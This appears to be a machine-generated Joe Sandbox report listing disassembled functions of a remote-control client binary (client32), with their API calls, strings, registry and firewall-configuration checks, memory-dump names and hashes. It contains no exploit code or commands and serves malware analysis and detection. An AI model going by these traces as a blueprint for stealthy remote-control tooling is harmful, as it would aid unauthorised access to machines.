Instruction ID: 8896b3f3378cccc65e9bab94f377e18e2855128faf3beda00f5a87bac3949b10
Opcode Fuzzy Hash: 3e91b062b7345433f88135f4591795957f231578769475b4b7857bd3e6af7e82
Instruction Fuzzy Hash: 0121D3B1D52638ABDB10CFDAD984ADEFFB8EB49B10F10451BF421E7644C7B445008B91

Function 11010140 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 102COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 1101016D
std::_Lockit::_Lockit.LIBCPMT ref: 11010190
std::bad_exception::bad_exception.LIBCMT ref: 11010214
__CxxThrowException@8.LIBCMT ref: 11010222
std::_Lockit::_Lockit.LIBCPMT ref: 11010235
std::locale::facet::_Facet_Register.LIBCPMT ref: 1101024F

Strings

bad cast, xrefs: 1101020C

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: LockitLockit::_std::_$Exception@8Facet_RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::_
String ID: bad cast
API String ID: 2427920155-3145022300
Opcode ID: 0888c3559ae941ddfd3a65509c7b8561ae704fbfc828ce88d4b35523d1ba3580
Instruction ID: 8605f433ca934ff223fddf63d9ff4cd14790153354e7e9eb7327a23900883db8
Opcode Fuzzy Hash: 0888c3559ae941ddfd3a65509c7b8561ae704fbfc828ce88d4b35523d1ba3580
Instruction Fuzzy Hash: 5631F975E00256DFCB05DFA4C880BDEF7B8FB05328F440169D866AB288DB79E904CB91

Function 111457A0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 146COMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,11195AD8), ref: 1114580D
SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?), ref: 1114584E
SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 111458AB

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

nsmdir < GP_MAX, xrefs: 111457CC
..\ctl32\util.cpp, xrefs: 111457C7, 11145869
FALSE || !"wrong nsmdir", xrefs: 1114586E

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: FolderPath$ErrorExitFileLastMessageModuleNameProcesswsprintf
String ID: ..\ctl32\util.cpp$FALSE || !"wrong nsmdir"$nsmdir < GP_MAX
API String ID: 3494822531-1878648853
Opcode ID: 1e9a8547f1a4d8db54bad5cbccf33acd14b41b9136434f7006fca57feb396e97
Instruction ID: 9d2f35c0ca678663173c9787aa50c950699104b7f99c1a06bf1b906e54d037ce
Opcode Fuzzy Hash: 1e9a8547f1a4d8db54bad5cbccf33acd14b41b9136434f7006fca57feb396e97
Instruction Fuzzy Hash: F3515E76D0422E9BEB15CF24DC50BDDF7B4AF15708F6001A4DC897B681EB716A88CB91

Function 1102A6D0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 101COMMON

Download Yara Rule

APIs

IsJPIK.PCICHEK(B24479DC,NSM.LIC,?,1102F092,View,Client,Bridge), ref: 1102A6F6

Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207

Part of subcall function 110D0A10: _free.LIBCMT ref: 110D0A3D

Strings

iks.lic, xrefs: 1102A740
_License, xrefs: 1102A778
Serial_no, xrefs: 1102A773
IKS, xrefs: 1102A787
NSM.LIC, xrefs: 1102A6E4

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: _free_malloc_memsetwsprintf
String ID: IKS$NSM.LIC$Serial_no$_License$iks.lic
API String ID: 2814900446-469156069
Opcode ID: 6b90f5a91e0e8404fc851c8f10d2236098875013011e5de61ca2dd828f746a24
Instruction ID: 268b58c6f7511c145cb41d8ae554306eba274149ba0ed4ca5467e6687dcac3b5
Opcode Fuzzy Hash: 6b90f5a91e0e8404fc851c8f10d2236098875013011e5de61ca2dd828f746a24
Instruction Fuzzy Hash: 8931AF35E01729ABDB00CFA8CC81BEEFBF4AB49714F104299E826A72C0DB756940C791

Function 11163CB2 Relevance: 10.6, APIs: 7, Instructions: 74COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlDecodePointer.NTDLL(?,?,?,?,?,11163DB6,?,111DCCE0,0000000C,11163DE2,?,?,1116E4BB,11177F11), ref: 11163CC7
DecodePointer.KERNEL32(?,?,?,?,?,11163DB6,?,111DCCE0,0000000C,11163DE2,?,?,1116E4BB,11177F11), ref: 11163CD4
__realloc_crt.LIBCMT ref: 11163D11
__realloc_crt.LIBCMT ref: 11163D27
EncodePointer.KERNEL32(00000000,?,?,?,?,?,11163DB6,?,111DCCE0,0000000C,11163DE2,?,?,1116E4BB,11177F11), ref: 11163D39
EncodePointer.KERNEL32(?,?,?,?,?,?,11163DB6,?,111DCCE0,0000000C,11163DE2,?,?,1116E4BB,11177F11), ref: 11163D4D
EncodePointer.KERNEL32(-00000004,?,?,?,?,?,11163DB6,?,111DCCE0,0000000C,11163DE2,?,?,1116E4BB,11177F11), ref: 11163D55

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Pointer$Encode$Decode__realloc_crt
String ID:
API String ID: 4108716018-0
Opcode ID: 78b66c0ccf40e1ea873e96cc16d33ba7024ac8dccc44993d1929be3c3bf886a8
Instruction ID: 9b559eab580439f7d32e9cac7dbac1f1bc4b8bf1504d6bec0d436b7e194fb771
Opcode Fuzzy Hash: 78b66c0ccf40e1ea873e96cc16d33ba7024ac8dccc44993d1929be3c3bf886a8
Instruction Fuzzy Hash: EA11D632518236AFDB005F79DCD488EFBEDEB41268751043AE819D7211EBB2ED54DB80

Function 110178F0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 71synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(00000188,000000FF), ref: 1101792C
CoInitialize.OLE32(00000000), ref: 11017935
_GetRawWMIStringW@16.PCICL32(Win32_ComputerSystem,00000001,?,?), ref: 1101795C
CoUninitialize.OLE32 ref: 110179C0

Strings

Win32_ComputerSystem, xrefs: 1101794D
PCSystemTypeEx, xrefs: 1101796C

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: InitializeObjectSingleStringUninitializeW@16Wait
String ID: PCSystemTypeEx$Win32_ComputerSystem
API String ID: 2407233060-578995875
Opcode ID: 0942cf205f413e43a7dce2a9957458248f39d685d8b5fb2cae19ac9a1649f750
Instruction ID: 979ee595df3e366e36f6db43f9274242a875182caa54ddfda208ac7f01cc4ef4
Opcode Fuzzy Hash: 0942cf205f413e43a7dce2a9957458248f39d685d8b5fb2cae19ac9a1649f750
Instruction Fuzzy Hash: BE213EB5D0166A9FDB11CFA48C40BBAB7E99F4170CF0000B4EC59DB188EB79D544D791

Function 11017810 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 70synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(00000188,000000FF), ref: 11017842
CoInitialize.OLE32(00000000), ref: 1101784B
_GetRawWMIStringW@16.PCICL32(Win32_SystemEnclosure,00000001,?,?), ref: 11017872
CoUninitialize.OLE32 ref: 110178D0

Strings

Win32_SystemEnclosure, xrefs: 11017863
ChassisTypes, xrefs: 11017882

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: InitializeObjectSingleStringUninitializeW@16Wait
String ID: ChassisTypes$Win32_SystemEnclosure
API String ID: 2407233060-2037925671
Opcode ID: 645120171e4998cce48753e45b0062292f56c9bef21460c25a07f93c3742c313
Instruction ID: 35f99737241494c501e89beb979cd88c9c6eddc8ed8b09fe319fdcc96c080ea2
Opcode Fuzzy Hash: 645120171e4998cce48753e45b0062292f56c9bef21460c25a07f93c3742c313
Instruction Fuzzy Hash: D7210875D4112A9BD711CFA4CD40BAEBBE89F40309F0000A4EC29DB244EE75D910C7A0

Function 11139600 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 68COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32(756F13E0,1103070D,Client,UseIPC,00000001,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 1113962A
GetTickCount.KERNEL32(756F13E0,1103070D,Client,UseIPC,00000001,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 11139631

Strings

DoICFConfig() OK, xrefs: 111396D6
Client, xrefs: 11139655
DesktopTimerProc - Further ICF config checking will not be performed, xrefs: 111396EC
AutoICFConfig, xrefs: 11139650

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CountTick
String ID: AutoICFConfig$Client$DesktopTimerProc - Further ICF config checking will not be performed$DoICFConfig() OK
API String ID: 536389180-1512301160
Opcode ID: e83ef9c3321bdfdd27f283cf6b907508dd25c61c4d3345a4079bbe31f7b349aa
Instruction ID: a12453e9faa0d912da9f55e5525ca7a81223e7cd1b6d2efb44fc6fc6c8488c0a
Opcode Fuzzy Hash: e83ef9c3321bdfdd27f283cf6b907508dd25c61c4d3345a4079bbe31f7b349aa
Instruction Fuzzy Hash: 2B21277CA262AF4AFB12CE75DED4791FA92278232EF010178D515862CCFBB49448CF46

Function 11096D90 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 58comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 11096DA4
CLSIDFromProgID.OLE32(HNetCfg.FwMgr,?), ref: 11096DBE
CoCreateInstance.OLE32(?,00000000,00000001,111C1B4C,?), ref: 11096DDB
CoUninitialize.OLE32 ref: 11096DF9

Strings

HNetCfg.FwMgr, xrefs: 11096DB9
ICF Present: , xrefs: 11096E00

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CreateFromInitializeInstanceProgUninitialize
String ID: HNetCfg.FwMgr$ICF Present:
API String ID: 3222248624-258972079
Opcode ID: 2f37d598b4012c0c7ec1fc3c7a41f1831d77099e3c9549bb0708a0a7a71d465f
Instruction ID: 9199824aa3bd6ebf99e58618a68c234682766c17c5e3bd8f83aabb27c1d0aea9
Opcode Fuzzy Hash: 2f37d598b4012c0c7ec1fc3c7a41f1831d77099e3c9549bb0708a0a7a71d465f
Instruction Fuzzy Hash: BC11C235F4111DABC700EFA59C84EEFFF789F44705B500468E51ADB104EA25A980C7E1

Function 110262F0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 54libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,GetProcessImageFileNameA,00000000,?,?,?,11030983,00000000,?,00000208), ref: 11026306
K32GetProcessImageFileNameA.KERNEL32(?,00000000,11030983,00000000,?,?,?,11030983,00000000,?,00000208), ref: 11026322
GetProcAddress.KERNEL32(?,GetModuleFileNameExA,00000000,?,?,?,11030983,00000000,?,00000208), ref: 11026336
SetLastError.KERNEL32(00000078,00000000,?,?,?,11030983,00000000,?,00000208), ref: 11026359

Strings

GetProcessImageFileNameA, xrefs: 11026300
GetModuleFileNameExA, xrefs: 11026330

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AddressProc$ErrorFileImageLastNameProcess
String ID: GetModuleFileNameExA$GetProcessImageFileNameA
API String ID: 4186647306-532032230
Opcode ID: 168c0276823b5447779d0ea544bca84f700d76740b4f854a777d5a44096f3b0a
Instruction ID: 183e1746e0b9fc2934bd9ec846e99aaf72a90bbb460a81bb2001b4ad07131d97
Opcode Fuzzy Hash: 168c0276823b5447779d0ea544bca84f700d76740b4f854a777d5a44096f3b0a
Instruction Fuzzy Hash: BE012D72A41319ABE720DEA5EC44F4BB7E8EB88765F40452AF955D7600D630E8048BA0

Function 11110040 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 52synchronizationthreadCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,774E42C0,00000000,?,11110F55,11110AF0,00000001,00000000), ref: 11110057
CreateThread.KERNEL32(00000000,11110F55,00000001,00000000,00000000,0000000C), ref: 1111007A
WaitForSingleObject.KERNEL32(?,000000FF,?,11110F55,11110AF0,00000001,00000000,?,?,?,?,?,11031700), ref: 111100A7
CloseHandle.KERNEL32(?), ref: 111100B1

Strings

..\ctl32\Refcount.cpp, xrefs: 1111008B
hThread, xrefs: 11110090

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Create$CloseEventHandleObjectSingleThreadWait
String ID: ..\ctl32\Refcount.cpp$hThread
API String ID: 3360349984-1136101629
Opcode ID: 4687833a1936dd26f91b2846a9cb7115301389be075d2048120d977a93bdefe6
Instruction ID: 76930d23ba1481c48ceb924dc08d7adf498fcac35268297604c83f904cd53e19
Opcode Fuzzy Hash: 4687833a1936dd26f91b2846a9cb7115301389be075d2048120d977a93bdefe6
Instruction Fuzzy Hash: A0018435780715BFF3208EA5CD85F57FBA9DB45765F104138FA259B6C4D670E8048BA0

Function 11116D50 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 51registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNEL32(80000002,System\CurrentControlSet\Control\GraphicsDrivers\DCI,00000000,0002001F,?), ref: 11116D7F
RegCloseKey.ADVAPI32(00000000), ref: 11116DB7
RegSetValueExA.ADVAPI32(00000000,Timeout,00000000,00000004,00000000,00000004), ref: 11116DD3
RegCloseKey.ADVAPI32(00000000), ref: 11116DDD

Part of subcall function 11143BD0: RegQueryValueExA.KERNEL32 ref: 11143BF0

Strings

System\CurrentControlSet\Control\GraphicsDrivers\DCI, xrefs: 11116D6E
Timeout, xrefs: 11116D9E, 11116DCD

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CloseValue$OpenQuery
String ID: System\CurrentControlSet\Control\GraphicsDrivers\DCI$Timeout
API String ID: 3962714758-504756767
Opcode ID: 71a3d5382f694e300ca8b739a0447eaf7c0fd6e11b25d11c78922669bca80467
Instruction ID: 446fff0cae762a3aa9587799f73bfd878db9d5469a1de9e4663b70f0b9132e6a
Opcode Fuzzy Hash: 71a3d5382f694e300ca8b739a0447eaf7c0fd6e11b25d11c78922669bca80467
Instruction Fuzzy Hash: 9E019E75640208BBEB14DBA0CE49FEEF77CAF04705F108158FE14AA5C5DBB0AA04CB65

Function 11032020 Relevance: 9.0, APIs: 1, Strings: 5, Instructions: 28COMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 11032067

Strings

506013, xrefs: 1103204E
_HF, xrefs: 11032048, 1103204D
_SW, xrefs: 1103203C
_HW, xrefs: 11032030
